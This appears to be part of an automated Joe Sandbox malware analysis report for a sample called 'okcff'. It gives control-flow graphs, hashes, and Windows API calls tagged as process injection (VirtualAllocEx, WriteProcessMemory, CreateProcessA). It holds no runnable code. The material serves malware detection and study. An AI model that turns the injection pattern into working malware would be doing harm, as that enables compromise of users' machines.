                                                            control_flow_graph 517 211d4b0-211d4bc 518 211d483-211d485 517->518 519 211d4be-211d59d 517->519 520 211d487-211d48d 518->520 521 211d49d-211d49f 518->521 544 211d575-211d5ab call 2112a08 519->544 545 211d65d-211d661 519->545 522 211d491-211d493 520->522 523 211d48f 520->523 642 211d4a1 call 21a7a30 521->642 643 211d4a1 call 21a7a80 521->643 522->521 523->521 525 211d4a7-211d4aa 554 211d5b4 544->554 555 211d5ad-211d5b2 544->555 546 211d667-211d689 call 2116ba8 545->546 547 211d75a-211d7ac 545->547 563 211d696-211d6a3 546->563 564 211d68b-211d694 call 2118778 546->564 644 211d7ae call 211d910 547->644 645 211d7ae call 211d903 547->645 558 211d5b6-211d5d6 554->558 555->558 571 211d616-211d618 558->571 576 211d6c3-211d6d7 563->576 577 211d6a5-211d6c1 call 2115a20 563->577 564->563 573 211d5d8-211d5ec 571->573 574 211d61a-211d648 571->574 588 211d8b0-211d8d4 573->588 589 211d5f2-211d615 call 2112a60 573->589 574->545 598 211d64a-211d65a call 21173b8 574->598 576->588 596 211d6dd-211d72c call 2112a60 call 2115a20 576->596 577->576 582 211d7b4-211d7e7 call 2112a08 599 211d7e9 582->599 600 211d848 582->600 589->571 636 211d753-211d754 596->636 637 211d72e-211d73a call 2112a08 596->637 605 211d7ec-211d7f0 599->605 611 211d893-211d8a8 600->611 612 211d7f2-211d7f8 605->612 613 211d7fe 605->613 611->588 617 211d800-211d806 612->617 618 211d7fa-211d7fc 612->618 613->617 617->588 622 211d80c-211d81e 617->622 618->617 628 211d820-211d826 622->628 629 211d842-211d846 622->629 628->588 630 211d82c-211d83d call 2115a20 call 2119a78 628->630 629->600 629->605 630->629 636->546 636->547 637->636 640 211d73c-211d742 637->640 640->588 641 211d748-211d74d 640->641 641->611 641->636 642->525 643->525 644->582 645->582
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll$fCll
                                                            • API String ID: 0-2296306532
                                                            • Opcode ID: e54d9445f537c6c884073b996bf4bf7d1294db73b79c4a763067a86a0743b3b9
                                                            • Instruction ID: 380a066af9e671f14e3767d55479c32aff005b6792849cd0dfeecce6ce4a076c
                                                            • Opcode Fuzzy Hash: e54d9445f537c6c884073b996bf4bf7d1294db73b79c4a763067a86a0743b3b9
                                                            • Instruction Fuzzy Hash: C9D16F31A84214DFCB19DFA4E480AADB7B6BF89304F568479E41AAF355DB31EC41CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02189F80, Relevance: 2.8, Strings: 2, Instructions: 344COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 646 2189f80-2189f89 647 2189f8a-2189f8b 646->647 648 2189f18-2189f28 call 2184350 647->648 649 2189f8c-2189f92 647->649 656 2189f2c-2189f31 648->656 650 2189fba-2189fbe 649->650 651 2189f94-2189fb3 649->651 653 2189fca-2189fd9 650->653 654 2189fc0-2189fc2 650->654 651->650 657 2189fdb 653->657 658 2189fe5-218a011 653->658 654->653 660 2189f2a 656->660 661 2189f33-2189f71 call 2186580 656->661 657->658 666 218a23e-218a287 658->666 667 218a017-218a01d 658->667 660->656 661->647 685 2189f73-2189f7e 661->685 701 218a289 666->701 702 218a29d-218a2a9 666->702 670 218a0ef-218a0f3 667->670 671 218a023-218a029 667->671 672 218a0f5-218a0fe 670->672 673 218a116-218a11f 670->673 671->666 675 218a02f-218a03c 671->675 672->666 676 218a104-218a114 672->676 677 218a121-218a141 673->677 678 218a144-218a147 673->678 680 218a0ce-218a0d7 675->680 681 218a042-218a04b 675->681 684 218a14a-218a150 676->684 677->678 678->684 680->666 682 218a0dd-218a0e9 680->682 681->666 683 218a051-218a069 681->683 682->670 682->671 687 218a06b 683->687 688 218a075-218a087 683->688 684->666 690 218a156-218a169 684->690 685->646 687->688 688->680 696 218a089-218a08f 688->696 690->666 692 218a16f-218a17f 690->692 692->666 695 218a185-218a192 692->695 695->666 698 218a198-218a1ad 695->698 699 218a09b-218a0a1 696->699 700 218a091 696->700 698->666 710 218a1b3-218a1d6 698->710 699->666 706 218a0a7-218a0cb 699->706 700->699 707 218a28c-218a28e 701->707 704 218a2ab 702->704 705 218a2b5-218a2d1 702->705 704->705 708 218a290-218a29b 707->708 709 218a2d2-218a2ff call 2185c18 707->709 708->702 708->707 721 218a301-218a307 709->721 722 218a317-218a319 709->722 710->666 715 218a1d8-218a1e3 710->715 718 218a234-218a23b 715->718 719 218a1e5-218a1ef 715->719 719->718 727 218a1f1-218a207 719->727 724 218a309 721->724 725 218a30b-218a30d 721->725 745 218a31b call 218a398 722->745 746 218a31b call 218a38a 722->746 747 218a31b call 218b570 722->747 724->722 725->722 726 218a321-218a325 728 218a370-218a380 726->728 729 218a327-218a33e 726->729 733 218a209 727->733 734 218a213-218a22c 727->734 729->728 737 218a340-218a34a 729->737 733->734 734->718 740 218a34c-218a35b 737->740 741 218a35d-218a36d 737->741 740->741 745->726 746->726 747->726
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll$d
                                                            • API String ID: 0-1604166580
                                                            • Opcode ID: 1dad37e9baeb26ab21f8bb0df53c06d9b1a6e0af3c29cce430021a4d8b7dbf8e
                                                            • Instruction ID: ef06efd950265d49a321e52d7e0d56d10ee0160aad8df94bd089a32084a2cd38
                                                            • Opcode Fuzzy Hash: 1dad37e9baeb26ab21f8bb0df53c06d9b1a6e0af3c29cce430021a4d8b7dbf8e
                                                            • Instruction Fuzzy Hash: 0CD17E306406058FCB24DF28C4909AAB7F3FF89314B25856AD55A9B761DB31FC46CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542D3F0, Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 748 542d3f0-542ecb1 830 542ec9a call 542ef10 748->830 831 542ec9a call 542d3f0 748->831 832 542ec9a call 542ef18 748->832 754 542ec9d-542eca7 755 542eca9 754->755 756 542ecaf-542ecba 754->756 757 542ecbb-542eccf 755->757 758 542ecab-542ecad 755->758 765 542ed3e-542ed41 757->765 758->756 758->757 766 542ed43-542ed4f 765->766 767 542ecd1-542ecd4 765->767 768 542ef01-542ef15 766->768 770 542ed55-542ed7a 766->770 767->768 769 542ecda-542ecea 767->769 782 542ef86 768->782 783 542ef17-542ef28 call 542d444 768->783 780 542ece8-542ecef 769->780 781 542ed3d 769->781 772 542edd0-542edd9 770->772 773 542ed7c 770->773 772->768 774 542eddf-542eded 772->774 777 542ed7f-542ed85 773->777 778 542ee10-542ee20 call 542d434 774->778 779 542edef-542ee08 call 542ec50 774->779 777->768 784 542ed8b-542edb2 777->784 805 542ee22 778->805 806 542ee24-542ee37 call 542ec50 778->806 779->778 780->781 795 542ecf1-542ed3c 780->795 781->765 789 542eff7 782->789 790 542ef88-542efbe 782->790 803 542ef2d-542ef31 783->803 791 542edb4 784->791 792 542edba-542edbc 784->792 798 542edb6-542edb8 791->798 799 542edbe 791->799 800 542edc3-542edc5 792->800 798->792 798->799 799->800 801 542edc7 800->801 802 542edca-542edce 800->802 801->802 802->772 802->777 805->806 813 542ee39-542ee4c 806->813 814 542ee4e-542ee92 806->814 813->814 819 542eec7-542eef6 813->819 833 542ee95 call 542f3d8 814->833 834 542ee95 call 542f3cd 814->834 826 542eef9-542ef00 819->826 827 542ee98-542eeaf 827->826 828 542eeb1-542eeb7 827->828 835 542eeb9 call 2111670 828->835 836 542eeb9 call 2111680 828->836 837 542eeb9 call 21116d6 828->837 838 542eeb9 call 21116d8 828->838 829 542eebf-542eec6 830->754 831->754 832->754 833->827 834->827 835->829 836->829 837->829 838->829
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D~o$~o
                                                            • API String ID: 0-1942811931
                                                            • Opcode ID: 0481833f8dcdf54094e8a107ca26d3962a983e78e04da7ab7ced84647de451c2
                                                            • Instruction ID: d639df2159a8a952c4a83dceedaed2092eaf09742421cf50d81c14098f893829
                                                            • Opcode Fuzzy Hash: 0481833f8dcdf54094e8a107ca26d3962a983e78e04da7ab7ced84647de451c2
                                                            • Instruction Fuzzy Hash: E9B1CB30A04636DFC714CF69C4849BAB7F6FF48310B558AAAE41ACB761D731E852CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0211B588, Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 926 211b588-211b5a9 927 211b5b4-211b5bb call 21118e0 926->927 928 211b5ab-211b5da 926->928 927->928 936 211b624 928->936 937 211b5dc-211b5e9 928->937 938 211b62c-211b674 936->938 940 211b5f7-211b5fc 937->940 941 211b5eb-211b5f1 937->941 946 211b67c-211b6a4 938->946 940->936 944 211b5fe-211b60a 940->944 942 211b5f3 941->942 943 211b5f5 941->943 942->940 943->940 944->946 947 211b60c-211b622 944->947 955 211b6a5 946->955 947->946 955->955
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Lo$Lo
                                                            • API String ID: 0-464136729
                                                            • Opcode ID: 8ce4c6622917edc45f509632e91a8be3f02b4e25b7a10f2c12c749a7780df61a
                                                            • Instruction ID: 3fbb6bb5d2d5140114b65f5972aa97411acd5e873b7b1629e81d054ff4573b0f
                                                            • Opcode Fuzzy Hash: 8ce4c6622917edc45f509632e91a8be3f02b4e25b7a10f2c12c749a7780df61a
                                                            • Instruction Fuzzy Hash: 69314F70B48218AFCF14DF65D950AAEBBF6AF58304F054469E516EB360DB31DE04CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021102F0, Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 956 21102f0-21102fe 957 2110300-2110309 956->957 958 211030a-211031c 956->958 960 2110325-2110367 958->960 961 211031e-2110324 958->961 972 2110342 call 2110378 960->972 973 2110342 call 2110388 960->973 966 2110348-2110371 972->966 973->966
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll$Duo
                                                            • API String ID: 0-967271190
                                                            • Opcode ID: 384a3c8a065dec580e08fd0346ba488e0090e1033fe9def2bb09fc8ae9674a3d
                                                            • Instruction ID: 5729ed8afe0b42d88119cb8a13fe3dffa73b131367ccc97ea6253a9de22061b5
                                                            • Opcode Fuzzy Hash: 384a3c8a065dec580e08fd0346ba488e0090e1033fe9def2bb09fc8ae9674a3d
                                                            • Instruction Fuzzy Hash: 1301B53274C200AFC71897A6B884ABBB3D6EBC8665B15413AEA1EC7640CB31EC81D751
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542D444, Relevance: 2.6, Strings: 2, Instructions: 51COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 974 542d444-542ef52 977 542ef54-542ef61 974->977 978 542efbc-542efbe 974->978 980 542ef63-542ef76 977->980 981 542ef80 977->981 980->981 983 542ef89-542efba 981->983 983->978
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: |o$,{o
                                                            • API String ID: 0-982683869
                                                            • Opcode ID: f1d051ebfee5fed2480463c3c7cc30fc8c39fef45809ddaad2b2d3c3faf8be3e
                                                            • Instruction ID: e4285acd0dc6829db8d247d537a7a80a92c3a03eca5565279a9b1c61c79c9fca
                                                            • Opcode Fuzzy Hash: f1d051ebfee5fed2480463c3c7cc30fc8c39fef45809ddaad2b2d3c3faf8be3e
                                                            • Instruction Fuzzy Hash: 98115B7031C724AFC324CF28C554A72B7EABF49714F52095EE2478BBA4CBA2F8158B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A9D90, Relevance: 2.2, APIs: 1, Instructions: 657COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • K32EnumProcesses.KERNEL32(?,?,?), ref: 021AA610
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: EnumProcesses
                                                            • String ID:
                                                            • API String ID: 84517404-0
                                                            • Opcode ID: 85d7b7e974fbb54ae989ca31c1e79b1eab86af6e9954b0469c02583e8b45726f
                                                            • Instruction ID: 0609afb5ab8b6fe0cff5ada8839494d8769474699c13883150b04800712fce8b
                                                            • Opcode Fuzzy Hash: 85d7b7e974fbb54ae989ca31c1e79b1eab86af6e9954b0469c02583e8b45726f
                                                            • Instruction Fuzzy Hash: DE426F78A44219DFCB289F68C8647BDBBF6AF48300F1544AAE11AEB351DB309D85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A8CF4, Relevance: 1.8, APIs: 1, Instructions: 326processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 021A8FC7
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 1e2ca0b83489de90b9eb8a638003fc5b0965a2214abfc25a56f2ccefe6d54b2e
                                                            • Instruction ID: 3ae2dd6d505619e0111fcdea6a27419dc14c324895f54c3f44c779a19b8511a8
                                                            • Opcode Fuzzy Hash: 1e2ca0b83489de90b9eb8a638003fc5b0965a2214abfc25a56f2ccefe6d54b2e
                                                            • Instruction Fuzzy Hash: B2C15574D00219CFDB20CFA4C851BEEBBB1BF49308F1195A9E849B7240DB749A89CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A8D00, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 021A8FC7
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: aac0e6a897cfa5747dfa6bf5c421ce633672f20084e32459d5fd10f82d0f4b2a
                                                            • Instruction ID: aec27ce8a533d02dc50e2e2f5b5e3da94dfb537fa06995ba746aba246066ad72
                                                            • Opcode Fuzzy Hash: aac0e6a897cfa5747dfa6bf5c421ce633672f20084e32459d5fd10f82d0f4b2a
                                                            • Instruction Fuzzy Hash: 11C14574D00219CFDB20CFA4C851BEEBBB1BF49308F1195A9E949B7240DB749A89CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021AB430, Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 021AB59F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: BaseModuleName
                                                            • String ID:
                                                            • API String ID: 595626670-0
                                                            • Opcode ID: bba2fbecb5e6c5c5d639a5264200beb683f899eff5ab0b38aa797c9e0eb4246f
                                                            • Instruction ID: 2d2d6a601f178fd27b928ee9629b311fdc6f3737611ff55344a8d82e8fafc5cc
                                                            • Opcode Fuzzy Hash: bba2fbecb5e6c5c5d639a5264200beb683f899eff5ab0b38aa797c9e0eb4246f
                                                            • Instruction Fuzzy Hash: 8B61CFB4D042589FCB14CFA9D994B9EFBF1BF59308F10912AE818AB351DB749945CF80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021AB426, Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 021AB59F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: BaseModuleName
                                                            • String ID:
                                                            • API String ID: 595626670-0
                                                            • Opcode ID: f9aa895f40e10e9d317c987d7b8824300bf0ab285bc97c65a4e413007a790dac
                                                            • Instruction ID: f8ef3f7c19b8a65cc60873edb21764ad4aa4d9f7a759e2a5fbbcba79858dab55
                                                            • Opcode Fuzzy Hash: f9aa895f40e10e9d317c987d7b8824300bf0ab285bc97c65a4e413007a790dac
                                                            • Instruction Fuzzy Hash: D261D174D082589FDB14CFA9D994B9EFBF1BF59308F109129E818AB351D7349945CF80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021173A8, Relevance: 1.6, Strings: 1, Instructions: 388COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll
                                                            • API String ID: 0-3231272322
                                                            • Opcode ID: 8dbe8829fc178df0e7d75a70a50ec8159521d2112557a9026468060f19195c00
                                                            • Instruction ID: a77bc168af3fe99cf196764879d03800949720d10dacb5ae89dc9322b71d91e0
                                                            • Opcode Fuzzy Hash: 8dbe8829fc178df0e7d75a70a50ec8159521d2112557a9026468060f19195c00
                                                            • Instruction Fuzzy Hash: 92F14D70E44218DFDB18DFA8D494AADBBB6AF48304F158479E416EB7A4DB30DC42CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A7E63, Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • K32EnumProcesses.KERNEL32(?,?,?), ref: 021AA610
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: EnumProcesses
                                                            • String ID:
                                                            • API String ID: 84517404-0
                                                            • Opcode ID: c913601cbd211a070ac1a46a6dcf5d0b1d6c5c4c9883c8e8d4e9eabf6619e82a
                                                            • Instruction ID: fb66728334ea2f67863e6185baf35b2efa5e419129164b3c1f58263e45373943
                                                            • Opcode Fuzzy Hash: c913601cbd211a070ac1a46a6dcf5d0b1d6c5c4c9883c8e8d4e9eabf6619e82a
                                                            • Instruction Fuzzy Hash: 5D51FFB5D052888FCB01CFA9D894ADEFFB0AF0A314F1580AAD454BB251D374AA45CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A8AA0, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 021A8B7B
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 3b404281fad6a81d6f53a62f8dba253cfdc7e40b05fef569ba556fb5a4735d6d
                                                            • Instruction ID: 0718f0f5683e2a5567c2be2d85710a974999c79fb82a157bedc675bb17378126
                                                            • Opcode Fuzzy Hash: 3b404281fad6a81d6f53a62f8dba253cfdc7e40b05fef569ba556fb5a4735d6d
                                                            • Instruction Fuzzy Hash: A041AAB5D052589FCF10CFA9D984ADEBBF1BF49314F14942AE818B7250D338AA45CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A8AA8, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 021A8B7B
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: c31deb3b11a2e35a4e8be23f7eee64e7536368649f496e2ee52735ebf9092201
                                                            • Instruction ID: c9ee6ca246d1e98fe2e8ca695f93ccfd0fed083014625b106fa9018edbcca66a
                                                            • Opcode Fuzzy Hash: c31deb3b11a2e35a4e8be23f7eee64e7536368649f496e2ee52735ebf9092201
                                                            • Instruction Fuzzy Hash: AF419AB5D052589FCF10CFA9D984ADEFBF1BB49314F14942AE818B7200D738AA45CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A7ED3, Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • K32EnumProcesses.KERNEL32(?,?,?), ref: 021AA610
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: EnumProcesses
                                                            • String ID:
                                                            • API String ID: 84517404-0
                                                            • Opcode ID: 776f4d3fe8c19e92d4d48444f17ee0e77f015f12669d2af6debc72dd0ee7288d
                                                            • Instruction ID: 3190a1092384f60a52f0892e432859b6015a236e868c890fda9087b2a81409ee
                                                            • Opcode Fuzzy Hash: 776f4d3fe8c19e92d4d48444f17ee0e77f015f12669d2af6debc72dd0ee7288d
                                                            • Instruction Fuzzy Hash: C641CCB9D042489FCB10CFA9D984ADEFBF0AF49310F14906AE818B7310D335AA45CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A9288, Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 021A933A
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: 09eb0a98a69f36a5bb45957b7ca034f036810af1b2d3c102b36dbaf032391920
                                                            • Instruction ID: e0958ef88d977b669d83919be9d42deab0b9fffc317285dc916b327c6862ec0b
                                                            • Opcode Fuzzy Hash: 09eb0a98a69f36a5bb45957b7ca034f036810af1b2d3c102b36dbaf032391920
                                                            • Instruction Fuzzy Hash: 1541A9B9D042589FCF00CFA9D984AEEFBB1BF59314F14942AE814B7240D735A945CF64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A9287, Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 021A933A
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: bdff030ffc300447f9ce01968354d2f08eb3006a2a965a5895db6a0b4be4a202
                                                            • Instruction ID: 17477e7a55d548744e1ed4740253cf2795ed99f4e7115b6a663e954cb6d76d49
                                                            • Opcode Fuzzy Hash: bdff030ffc300447f9ce01968354d2f08eb3006a2a965a5895db6a0b4be4a202
                                                            • Instruction Fuzzy Hash: B141C9B9D042589FCF00CFA9D980AEEFBB1BF59314F14942AE814B7240D735A945CF64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A8980, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 021A8A32
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 5919812a514bbea576df4e1b52cf3bfa596ba12c5c87c8e6da05736197f07956
                                                            • Instruction ID: cd7c8e73ead626e386bb0a691538d1b907e386e8b369c744b58fea1ea0603c2a
                                                            • Opcode Fuzzy Hash: 5919812a514bbea576df4e1b52cf3bfa596ba12c5c87c8e6da05736197f07956
                                                            • Instruction Fuzzy Hash: 2631A8B9D042489FCF00CFA9D980A9EBBB1BB59314F14A42AE815BB300D735A942CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A8988, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 021A8A32
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 4e7345a2133380648af6198c9cc270f55d755a53357fb274227b3f7692ebc981
                                                            • Instruction ID: e99aebca1453a2b03f06827ff07848053293d7c87e2d0d3bfbc1a5a287351ee2
                                                            • Opcode Fuzzy Hash: 4e7345a2133380648af6198c9cc270f55d755a53357fb274227b3f7692ebc981
                                                            • Instruction Fuzzy Hash: 913195B9D042589BCF00CFA9D980AAEFBB1BB59314F14A42AE815B7200D735A945CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021AB30A, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 021AB3B6
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: EnumModulesProcess
                                                            • String ID:
                                                            • API String ID: 1082081703-0
                                                            • Opcode ID: 055d7bf4b417f710684b99ed9e31b1d13ed54de122b7ffd2c2b82166be0a75e1
                                                            • Instruction ID: af823added52011a515c935daf2d85f269512b823d3fc4fd76f1b7e97a0d9399
